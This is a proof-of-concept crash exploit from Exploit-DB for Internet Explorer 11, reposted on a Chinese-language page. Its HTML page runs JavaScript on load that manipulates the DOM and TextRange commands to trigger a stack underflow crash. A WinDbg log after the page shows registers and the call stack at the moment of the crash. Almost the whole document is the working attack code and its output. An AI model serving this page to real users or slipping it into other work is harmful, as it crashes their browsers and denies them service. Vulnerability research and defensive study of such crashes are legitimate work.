Microsoft Internet Explorer 11 – Stack Underflow Crash (PoC)

  • 作者: Mjx
    日期: 2015-09-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38146/
  • <!--
# Exploit title: Microsoft Internet Explorer 11 Stack Underflow Crash PoC
# Date: 09.11.2015
# Vulnerable version: 11 (32bit version)(newest at the time 11.0.9600.17843 and 11.0.10240.16431)
# Tested on: Windows 7 64bitand Windows 10(10240) 64bit
# Author: Mjx
# http://http://jinxin.pen.io/ 
-->
<!doctype html>
<html>
	<head>
		<meta http-equiv='Cache-Control' content='no-cache'/>
	
		<title>crash IE 11</title>
		<style></style>
		<script type='text/javascript' ></script>
		<script>
			
			function crash()
			{
				 var id_0 = null;
				 id_0 = document.createElement( 'THEAD' ); 
				 document.body.appendChild( id_0 ); 
				 elemTree = []; 
				 elemTree[0]= document.createElement('SELECT'); 
				 document.all[7].appendChild(elemTree[0]); 
				 elemTree[1]= document.createElement('B'); 
				 document.all[8].appendChild(elemTree[1]); 
				 elemTree[2]= document.createElement('SOURCE'); 
				 document.all[0].appendChild(elemTree[2]); 
				 elemTree[3]= document.createElement('HR'); 
				 document.all[8].appendChild(elemTree[3]); 
	 elemTree[3].setAttribute('hidden', -4400000000); 
				 elemTree[4]= document.createElement('SELECT'); 
				 document.all[9].appendChild(elemTree[4]); 		
				 elemTree[5]= document.createElement('RUBY'); 
				 document.all[2].appendChild(elemTree[5]); 		
				 elemTree[6]= document.createElement('OL'); 
				 document.all[4].appendChild(elemTree[6]); 		
				 elemTree[7]= document.createElement('AREA'); 
				 document.all[6].appendChild(elemTree[7]); 			
				 elemTree[8]= document.createElement('ARTICLE'); 
				 document.all[3].appendChild(elemTree[8]); 
				 elemTree[9]= document.createElement('TEXTAREA'); 
				 document.all[1].appendChild(elemTree[9]); 
			 txtRange = document.body.createTextRange(); 
				 txtRange.moveEnd('character', 14); 
				 txtRange.select(); 
				 txtRange.execCommand('insertUnorderedList',true,null); 			
				 txtRange = document.body.createTextRange(); 
				 txtRange.moveEnd('sentence', 4); 
				 txtRange.select(); 
				 txtRange.execCommand('insertOrderedList',true,null); 
			
			}
		</script>
	</head>
	<body onload='crash();'>
		
	</body>
</html>

<!--
(1428.1230): Stack overflow - code c00000fd (!!! second chance !!!)
eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000
eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0 nv up ei pl nz na po nc
cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010202
verifier!AVrfpDphAllocateVm+0x9:
5fd166d9 50pusheax
0:008> kb
ChildEBP RetAddrArgs to Child
09ab3004 5fd16800 09ab319c 09ab31a0 00001000 verifier!AVrfpDphAllocateVm+0x9
09ab3184 5fd16a8d 09ab319c 09ab31a0 00000004 verifier!DphCommitMemoryForPageHeap+0xf0
09ab31ac 5fd18e5d 000f1000 47de0068 00000000 verifier!AVrfpDphSetProtectionsBeforeUse+0x8d
09ab31dc 77cf0d96 000f0000 01000002 00000028 verifier!AVrfDebugPageHeapAllocate+0x1fd
0:008> r
eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000
eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0 nv up ei pl nz na po nc
cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010202
verifier!AVrfpDphAllocateVm+0x9:
5fd166d9 50pusheax
0:008> !vprot esp-4
BaseAddress: 09ab2000
AllocationBase:09ab0000
AllocationProtect: 00000004PAGE_READWRITE
RegionSize:001fe000
State: 00001000MEM_COMMIT
Protect: 00000004PAGE_READWRITE
Type:00020000MEM_PRIVATE


-->
    PowerShell